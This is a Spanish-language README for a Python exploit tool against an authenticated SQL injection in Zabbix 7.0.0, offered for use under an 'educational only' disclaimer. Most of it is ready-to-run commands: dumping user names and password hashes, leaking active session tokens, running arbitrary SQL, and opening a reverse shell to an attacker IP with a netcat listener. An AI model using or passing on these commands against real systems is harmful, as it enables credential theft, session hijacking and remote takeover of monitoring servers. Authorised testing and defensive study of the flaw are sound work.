
Esto es solo para fines educativos. Por favor, no lo use contra sistemas no autorizados.
Un script en Python para explotar una vulnerabilidad de inyección SQL autenticada en Zabbix 7.0.0, que admite múltiples modos de acción, incluida la extracción de datos de usuario, fuga de tokens de sesión, ejecución remota de comandos (RCE) e inyección de consultas personalizadas.
⚠️ AVISO LEGAL:
Este script es únicamente para fines educativos y de pruebas de penetración autorizadas.
No lo utilice en sistemas que no posea o para los que no tenga permiso explícito de prueba.
El autor no se hace responsable por cualquier uso indebido o daño causado por esta herramienta.
requests libraryInstale los requisitos si es necesario:
pip install requests
python3 sqliZabbix.py -u <ZABBIX_URL> -U <USERNAME> -p <PASSWORD> --mode <MODE> [optional args...]
| Modo | Descripción | Requiere Token de Admin |
|---|---|---|
| leak-users | Vuelca todos los IDs de usuario, nombres de usuario, hashes de contraseñas y roles | ❌ |
| leak-tokens | Vuelca todos los IDs de sesión activos de la base de datos | ❌ |
| rce | Genera una shell inversa mediante el exploit item.create | ✅ |
| custom | Ejecuta cualquier consulta SQL personalizada a través de la inyección | ❌ |
Volcar Hashes de Usuario
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-users
Filtrar Tokens de Sesión
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-tokens
Ejecución Remota de Comandos (Shell Inversa)
# Start a listener first:
nc -lvnp 9001
# Then run:
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --admin_token <ADMIN_API_TOKEN> --ip <YOUR_IP> --port 9001 --mode rce
Inyección SQL Personalizada
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode custom --query "SELECT version()"
sqliZabbix.py # Main exploit script
README.md # This documentation
Anthony (@874anthony)
Elaborado con amor y curiosidad 🐍
Este proyecto se publica bajo la Licencia MIT. Úselo de manera responsable.